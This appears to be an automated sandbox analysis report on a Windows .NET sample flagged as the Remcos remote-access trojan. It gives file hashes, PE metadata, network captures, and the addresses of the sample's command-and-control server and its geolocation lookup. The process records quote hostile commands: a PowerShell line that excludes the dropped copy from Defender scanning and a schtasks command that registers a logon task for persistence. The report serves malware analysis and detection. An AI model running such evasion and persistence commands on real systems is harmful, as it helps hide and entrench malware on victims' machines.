          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File Type:XML 1.0 document, ASCII text
          Category:dropped
          Size (bytes):1601
          Entropy (8bit):5.111177643265979
          Encrypted:false
          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLyxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTyv
          MD5:50D4DFE59547FD2189BB6D69C3BDD484
          SHA1:710E99B0CBEE3C46C260AF612757E39259300F45
          SHA-256:69162406931DA64721A73ACA1B6F17254077496021CD53F409ED2881D37041DA
          SHA-512:D5AFF4ACEAF6DFC6E51A75F3F0C2618375BE092580F860AB91FDC361E27BD2969261F8376EB65DFC25FDD17E7E9E65723CBFEB20231A233CEE4E3DED6CD2FA1C
          Malicious:true
          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
          Process:C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          File Type:XML 1.0 document, ASCII text
          Category:dropped
          Size (bytes):1601
          Entropy (8bit):5.111177643265979
          Encrypted:false
          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLyxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTyv
          MD5:50D4DFE59547FD2189BB6D69C3BDD484
          SHA1:710E99B0CBEE3C46C260AF612757E39259300F45
          SHA-256:69162406931DA64721A73ACA1B6F17254077496021CD53F409ED2881D37041DA
          SHA-512:D5AFF4ACEAF6DFC6E51A75F3F0C2618375BE092580F860AB91FDC361E27BD2969261F8376EB65DFC25FDD17E7E9E65723CBFEB20231A233CEE4E3DED6CD2FA1C
          Malicious:false
          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):972800
          Entropy (8bit):7.826314472644776
          Encrypted:false
          SSDEEP:24576:1q7ngtNkKoxK5AP2EwiRcsgL5UNs3hpJB3FcU8Q:g7g7kKoKAOEF8UNYhpJ5F/8Q
          MD5:B8896A4D1ADBEFCC7FE4CAC53B134968
          SHA1:E7A68F4C1AC47ECC6CC43B12DC82651CFF63F670
          SHA-256:7815D02DD41DD657438B4B226F4AC1A33D6A37159E34448627088E1354F9AB69
          SHA-512:408CCA545C8556B6191629D40AC69A25A2396E90B1DAA74780BF5EEC62ABF908413836087FB45C48205CD35ACD653884FB958CECDD3A25F487B1C3B864E10E83
          Malicious:true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: Virustotal, Detection: 32%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*................0.............j.... ........@.. .......................@............@.....................................O............................ ..........p............................................ ............... ..H............text...p.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................I.......H...........4Q......`.....................................................{....*"..}....*~.(.......s....}.....s....}....*>..{.....o.....*>..{.....o.....*....0............{.....+..*.0............{.....+..*j..{....o......{....o.....*..{....*"..}....*..{....*"..}....*..{....*"..}....*...0...........(.........%.(......(.....*..0..............%.(......(.....*.0............s.......o....o.......o....o.......o.....+O.o.......u.........,$..(..........X(.......u....(......+...(........
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:true
          Preview:[ZoneTransfer]....ZoneId=0
          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):7.826314472644776
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          • Win32 Executable (generic) a (10002005/4) 49.78%
          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          File name:SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File size:972'800 bytes
          MD5:b8896a4d1adbefcc7fe4cac53b134968
          SHA1:e7a68f4c1ac47ecc6cc43b12dc82651cff63f670
          SHA256:7815d02dd41dd657438b4b226f4ac1a33d6a37159e34448627088e1354f9ab69
          SHA512:408cca545c8556b6191629d40ac69a25a2396e90b1daa74780bf5eec62abf908413836087fb45c48205cd35acd653884fb958cecdd3a25f487b1c3b864e10e83
          SSDEEP:24576:1q7ngtNkKoxK5AP2EwiRcsgL5UNs3hpJB3FcU8Q:g7g7kKoKAOEF8UNYhpJ5F/8Q
          TLSH:732512A43A16DA02C9A453FA0DB2FAB4177C1ECEA501D7568FEAADDF7572F012D40183
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.................0.............j.... ........@.. .......................@............@................................
          Icon Hash:00928e8e8686b000
          Entrypoint:0x4eed6a
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0xB5CBC42A [Thu Aug 26 06:35:22 2066 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xeed15 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf0000 | 0x5ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xecda8 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xecd70 | 0xece00 | f473f4b890e4d87fdf25525ba52567a4 | False | 0.9208670019788918 | data | 7.831449073906565 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xf0000 | 0x5ac | 0x600 | a218e0384a114232f91418375b6e31fc | False | 0.4186197916666667 | data | 4.080098600579087 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf2000 | 0xc | 0x200 | 676567dd7fbc47c348c5a0e944ffc4ca | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xf0090 | 0x31c | data | | | 0.4321608040201005
RT_MANIFEST | 0xf03bc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-28T11:37:58.812561+0200 | TCP | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
2024-08-28T11:37:57.926996+0200 | TCP | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
2024-08-28T11:40:00.330083+0200 | TCP | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
2024-08-28T11:42:01.566854+0200 | TCP | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
2024-08-28T11:38:00.275897+0200 | TCP | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 11:37:57.856082916 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:37:57.912115097 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:37:57.912178993 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:37:57.926995993 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:37:57.931997061 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:37:58.812561035 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:37:58.815752983 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:37:58.820692062 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:37:59.008941889 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:37:59.062889099 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:37:59.661051035 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:37:59.665910006 CEST | 80 | 49714 | 178.237.33.50 | 192.168.2.6
Aug 28, 2024 11:37:59.665987015 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:37:59.666254997 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:37:59.671343088 CEST | 80 | 49714 | 178.237.33.50 | 192.168.2.6
Aug 28, 2024 11:38:00.275842905 CEST | 80 | 49714 | 178.237.33.50 | 192.168.2.6
Aug 28, 2024 11:38:00.275897026 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:38:00.291611910 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:38:00.301120043 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:38:01.280689955 CEST | 80 | 49714 | 178.237.33.50 | 192.168.2.6
Aug 28, 2024 11:38:01.280746937 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:38:29.255758047 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:38:29.256998062 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:38:29.261831045 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:38:59.528814077 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:38:59.529953957 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:38:59.538520098 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:39:30.069163084 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:39:30.070080042 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:39:30.070547104 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:39:30.070579052 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:39:30.075582027 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:39:49.610013962 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:39:49.922285080 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:39:50.531697989 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:39:51.734796047 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:39:54.141084909 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:39:58.953578949 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:40:00.330082893 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:40:00.334799051 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:40:00.339857101 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:40:08.562953949 CEST | 49714 | 80 | 192.168.2.6 | 178.237.33.50
Aug 28, 2024 11:40:30.580300093 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:40:30.586666107 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:40:30.591499090 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:41:00.908044100 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:41:00.909122944 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:41:00.920205116 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:41:31.261389971 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:41:31.262394905 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:41:31.268196106 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:42:01.566854000 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Aug 28, 2024 11:42:01.567195892 CEST | 49712 | 45682 | 192.168.2.6 | 172.93.220.148
Aug 28, 2024 11:42:01.572051048 CEST | 45682 | 49712 | 172.93.220.148 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 11:37:59.647403002 CEST | 54436 | 53 | 192.168.2.6 | 1.1.1.1
Aug 28, 2024 11:37:59.655013084 CEST | 53 | 54436 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 28, 2024 11:37:59.647403002 CEST | 192.168.2.6 | 1.1.1.1 | 0xb5fe | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 28, 2024 11:37:59.655013084 CEST | 1.1.1.1 | 192.168.2.6 | 0xb5fe | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
          • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49714 | 178.237.33.50 | 80 | 6864 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 11:37:59.666254997 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Aug 28, 2024 11:38:00.275842905 CEST | 1170 | IN | HTTP/1.1 200 OK
          date: Wed, 28 Aug 2024 09:38:00 GMT
          server: Apache
          content-length: 962
          content-type: application/json; charset=utf-8
          cache-control: public, max-age=300
          access-control-allow-origin: *
          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



          Target ID:0
          Start time:05:37:54
          Start date:28/08/2024
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
          Imagebase:0x890000
          File size:972'800 bytes
          MD5 hash:B8896A4D1ADBEFCC7FE4CAC53B134968
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          Reputation:low
          Has exited:true

          Target ID:3
          Start time:05:37:55
          Start date:28/08/2024
          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
          Imagebase:0xef0000
          File size:433'152 bytes
          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:4
          Start time:05:37:56
          Start date:28/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:05:37:56
          Start date:28/08/2024
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"
          Imagebase:0xc20000
          File size:187'904 bytes
